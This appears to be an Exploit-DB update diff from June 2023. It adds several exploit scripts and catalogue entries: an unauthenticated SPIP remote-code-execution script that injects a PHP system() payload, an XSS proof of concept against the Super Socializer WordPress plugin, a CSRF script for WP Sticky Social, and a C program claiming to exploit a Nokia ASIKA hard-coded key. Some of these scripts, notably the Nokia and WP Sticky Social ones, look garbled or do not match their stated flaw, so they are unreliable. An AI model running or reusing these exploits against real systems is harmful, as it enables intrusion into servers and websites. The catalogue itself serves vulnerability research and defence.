DB: 2023-06-21

8 changes to exploits/shellcodes/ghdb

Nokia ASIKA 7.13.52 - Hard-coded private key disclosure

SPIP v4.2.1 - Remote Code Execution (Unauthenticated)

Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)

Super Socializer 7.13.52 - Reflected XSS

WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

exploits/hardware/remote/51535.c

@@ -0,0 +1,132 @@
+// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure
+// Date: 2023-06-20
+// Exploit Author: Amirhossein Bahramizadeh
+// Category : Hardware
+// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/
+// Version: 7.13.52 (REQUIRED)
+// Tested on: Windows/Linux
+// CVE : CVE-2023-25187
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <signal.h>
+
+// The IP address of the vulnerable device
+char *host = "192.168.1.1";
+
+// The default SSH port number
+int port = 22;
+
+// The username and password for the BTS service user account
+char *username = "service_user";
+char *password = "password123";
+
+// The IP address of the attacker's machine
+char *attacker_ip = "10.0.0.1";
+
+// The port number to use for the MITM attack
+int attacker_port = 2222;
+
+// The maximum length of a message
+#define MAX_LEN 1024
+
+// Forward data between two sockets
+void forward_data(int sock1, int sock2)
+{
+    char buffer[MAX_LEN];
+    ssize_t bytes_read;
+
+    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)
+    {
+        write(sock2, buffer, bytes_read);
+    }
+}
+
+int main()
+{
+    int sock, pid1, pid2;
+    struct sockaddr_in addr;
+    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};
+
+    // Create a new socket
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+
+    // Set the address to connect to
+    memset(&addr, 0, sizeof(addr));
+    addr.sin_family = AF_INET;
+    addr.sin_port = htons(port);
+    inet_pton(AF_INET, host, &addr.sin_addr);
+
+    // Connect to the vulnerable device
+    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
+    {
+        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));
+        exit(1);
+    }
+
+    // Send the SSH handshake
+    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);
+    read(sock, NULL, 0);
+
+    // Send the username
+    write(sock, username, strlen(username));
+    write(sock, "\r\n", 2);
+    read(sock, NULL, 0);
+
+    // Send the password
+    write(sock, password, strlen(password));
+    write(sock, "\r\n", 2);
+
+    // Wait for the authentication to complete
+    sleep(1);
+
+    // Start an SSH client on the attacker's machine
+    pid1 = fork();
+    if (pid1 == 0)
+    {
+        execv("/usr/bin/ssh", argv);
+        exit(0);
+    }
+
+    // Start an SSH server on the attacker's machine
+    pid2 = fork();
+    if (pid2 == 0)
+    {
+        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);
+        exit(0);
+    }
+
+    // Wait for the SSH server to start
+    sleep(1);
+
+    // Forward data between the client and the server
+    pid1 = fork();
+    if (pid1 == 0)
+    {
+        forward_data(sock, STDIN_FILENO);
+        exit(0);
+    }
+    pid2 = fork();
+    if (pid2 == 0)
+    {
+        forward_data(STDOUT_FILENO, sock);
+        exit(0);
+    }
+
+    // Wait for the child processes to finish
+    waitpid(pid1, NULL, 0);
+    waitpid(pid2, NULL, 0);
+
+    // Close the socket
+    close(sock);
+
+    return 0;
+}

exploits/php/webapps/51533.py

@@ -0,0 +1,47 @@
+# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
+#  Dork: inurl:~/admin/views/admin.php
+# Date: 2023-06-20
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : Webapps
+# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
+# Version: 1.0.1 (REQUIRED)
+# Tested on: Windows/Linux
+# CVE : CVE-2023-3320
+
+import requests
+import hashlib
+import time
+
+# Set the target URL
+url = "http://example.com/wp-admin/admin.php?page=wpss_settings"
+
+# Set the user agent string
+user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
+
+# Generate the nonce value
+nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()
+
+# Set the data payload
+payload = {
+    "wpss_nonce": nonce,
+    "wpss_setting_1": "value_1",
+    "wpss_setting_2": "value_2",
+    # Add additional settings as needed
+}
+
+# Set the request headers
+headers = {
+    "User-Agent": user_agent,
+    "Referer": url,
+    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
+    # Add additional headers as needed
+}
+
+# Send the POST request
+response = requests.post(url, data=payload, headers=headers)
+
+# Check the response status code
+if response.status_code == 200:
+    print("Request successful")
+else:
+    print("Request failed")

exploits/php/webapps/51534.py

@@ -0,0 +1,28 @@
+# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
+# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
+# Date: 2023-06-20
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : Webapps
+# Vendor Homepage: https://wordpress.org/plugins/super-socializer
+# Version: 7.13.52 (REQUIRED)
+# Tested on: Windows/Linux
+# CVE : CVE-2023-2779
+import requests
+
+# The URL of the vulnerable AJAX endpoint
+url = "https://example.com/wp-admin/admin-ajax.php"
+
+# The vulnerable parameter that is not properly sanitized and escaped
+vulnerable_param = "<img src=x onerror=alert(document.domain)>"
+
+# The payload that exploits the vulnerability
+payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}
+
+# Send a POST request to the vulnerable endpoint with the payload
+response = requests.post(url, data=payload)
+
+# Check if the payload was executed by searching for the injected script tag
+if "<img src=x onerror=alert(document.domain)>" in response.text:
+    print("Vulnerability successfully exploited")
+else:
+    print("Vulnerability not exploitable")

exploits/php/webapps/51536.py

@@ -0,0 +1,70 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)
+# Google Dork: inurl:"/spip.php?page=login"
+# Date: 19/06/2023
+# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)
+# Vendor Homepage: https://www.spip.net/
+# Software Link: https://files.spip.net/spip/archives/
+# Version: < 4.2.1 (Except few fixed versions indicated in the description)
+# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0
+# CVE reference : CVE-2023-27372 (coiffeur)
+# CVSS : 9.8 (Critical)
+#
+# Vulnerability Description:
+#
+# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
+# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.
+#
+# Usage: python3 CVE-2023-27372.py http://example.com
+
+import argparse
+import bs4
+import html
+import requests
+
+def parseArgs():
+    parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")
+    parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")
+    parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")
+    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")
+    return parser.parse_args()
+
+def get_anticsrf(url):
+    r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)
+    soup = bs4.BeautifulSoup(r.text, 'html.parser')
+    csrf_input = soup.find('input', {'name': 'formulaire_action_args'})
+    if csrf_input:
+        csrf_value = csrf_input['value']
+        if options.verbose:
+            print("[+] Anti-CSRF token found : %s" % csrf_value)
+        return csrf_value
+    else:
+        print("[-] Unable to find Anti-CSRF token")
+        return -1
+
+def send_payload(url, payload):
+    data = {
+        "page": "spip_pass",
+        "formulaire_action": "oubli",
+        "formulaire_action_args": csrf,
+        "oubli": payload
+    }
+    r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)
+    if options.verbose:
+        print("[+] Execute this payload : %s" % payload)
+    return 0
+
+if __name__ == '__main__':
+    options = parseArgs()
+
+    requests.packages.urllib3.disable_warnings()
+    requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
+    try:
+        requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
+    except AttributeError:
+        pass
+
+    csrf = get_anticsrf(url=options.url)
+    send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))

exploits/python/webapps/51532.py

@@ -17,7 +17,7 @@ arguments = parser.parse_args()
 
 def doRequest(url):
     try:
-        res = requests.get(url)
+        res = requests.get(url + '/flash/addcrypted2')
         if res.status_code == 200:
             return True
         else:

files_exploits.csv

@@ -3794,6 +3794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51195,exploits/hardware/remote/51195.py,"Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Yerodin Richards",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-44149,,,,,
 25966,exploits/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",remote,hardware,,2005-07-12,2013-06-05,1,CVE-2005-2277;OSVDB-17853,,,,,https://www.securityfocus.com/bid/14232/info
 1081,exploits/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",remote,hardware,,2005-07-02,,1,OSVDB-17852;CVE-2005-2250,,,,,
+51535,exploits/hardware/remote/51535.c,"Nokia ASIKA 7.13.52 - Hard-coded private key disclosure",2023-06-20,"Amirhossein Bahramizadeh",remote,hardware,,2023-06-20,2023-06-20,0,CVE-2023-25187,,,,,
 22533,exploits/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",remote,hardware,,2003-04-24,2012-11-07,1,,,,,,https://www.securityfocus.com/bid/7426/info
 22350,exploits/hardware/remote/22350.txt,"Nokia SGSN DX200 - Remote SNMP Information Disclosure",2003-03-13,"Ollie Whitehouse",remote,hardware,,2003-03-13,2012-10-30,1,,,,,,https://www.securityfocus.com/bid/7081/info
 8316,exploits/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,remote,hardware,,2009-03-29,,1,OSVDB-53481,,,,,
@@ -29965,6 +29966,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,webapps,php,80,2016-10-20,2016-10-20,1,CVE-2016-7998,,,,http://www.exploit-db.comSPIP-v3.1.2.zip,
 9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,webapps,php,,2009-08-17,,1,CVE-2009-3041;OSVDB-57510,,,,,
 33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",webapps,php,80,2014-05-19,2014-05-21,0,CVE-2013-2118;OSVDB-93683,,,,http://www.exploit-db.comSPIP-v3.0.8.zip,
+51536,exploits/php/webapps/51536.py,"SPIP v4.2.1 - Remote Code Execution (Unauthenticated)",2023-06-20,AK,webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-27372,,,,,
 10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
 34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info
 35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",webapps,php,,2011-03-29,2014-12-15,1,,,,,,https://www.securityfocus.com/bid/47077/info
@@ -30097,7 +30099,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50782,exploits/php/webapps/50782.txt,"Student Record System 1.0 - 'cid' SQLi (Authenticated)",2022-02-23,"Mohd. Anees",webapps,php,,2022-02-23,2022-02-23,0,,,,,,
 49513,exploits/php/webapps/49513.txt,"Student Record System 4.0 - 'cid' SQL Injection",2021-02-02,"Jannick Tiger",webapps,php,,2021-02-02,2021-02-02,0,,,,,,
 49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php,,2021-06-10,2021-06-10,0,,,,,,
-51528,exploits/php/webapps/51528.txt,"Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)",2023-06-19,"VIVEK CHOUDHARY",webapps,php,,2023-06-19,2023-06-19,0,CVE-2023-33580,,,,,
+51528,exploits/php/webapps/51528.txt,"Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)",2023-06-19,"VIVEK CHOUDHARY",webapps,php,,2023-06-19,2023-06-20,1,CVE-2023-33580,,,,,
 8481,exploits/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload",2009-04-20,JosS,webapps,php,,2009-04-19,,1,OSVDB-53813;CVE-2009-1483,,,,,
 8509,exploits/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",webapps,php,,2009-04-20,,1,,,,,,
 41112,exploits/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@@ -30177,6 +30179,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9270,exploits/php/webapps/9270.txt,"Super Mod System 3.0 - 's' SQL Injection",2009-07-27,MizoZ,webapps,php,,2009-07-26,,1,OSVDB-56562;CVE-2009-3224,,,,,
 9180,exploits/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - 'entry' SQL Injection",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55952;CVE-2009-2553,,,,,
 9179,exploits/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55953;CVE-2009-2552,,,,,
+51534,exploits/php/webapps/51534.py,"Super Socializer 7.13.52 - Reflected XSS",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-2779,,,,,
 8874,exploits/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,webapps,php,,2009-06-03,,1,,,,,,
 4141,exploits/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,webapps,php,,2007-07-02,2016-10-05,1,OSVDB-36300;CVE-2007-3582,,,,http://www.exploit-db.comsupercali-0.4.0.zip,
 44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,,2018-05-17,2018-06-15,0,,"Cross-Site Scripting (XSS)",,,,
@@ -33764,6 +33767,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
+51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
@@ -34533,7 +34537,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
-51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-15,1,CVE-2023-0297,,,,,
+51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,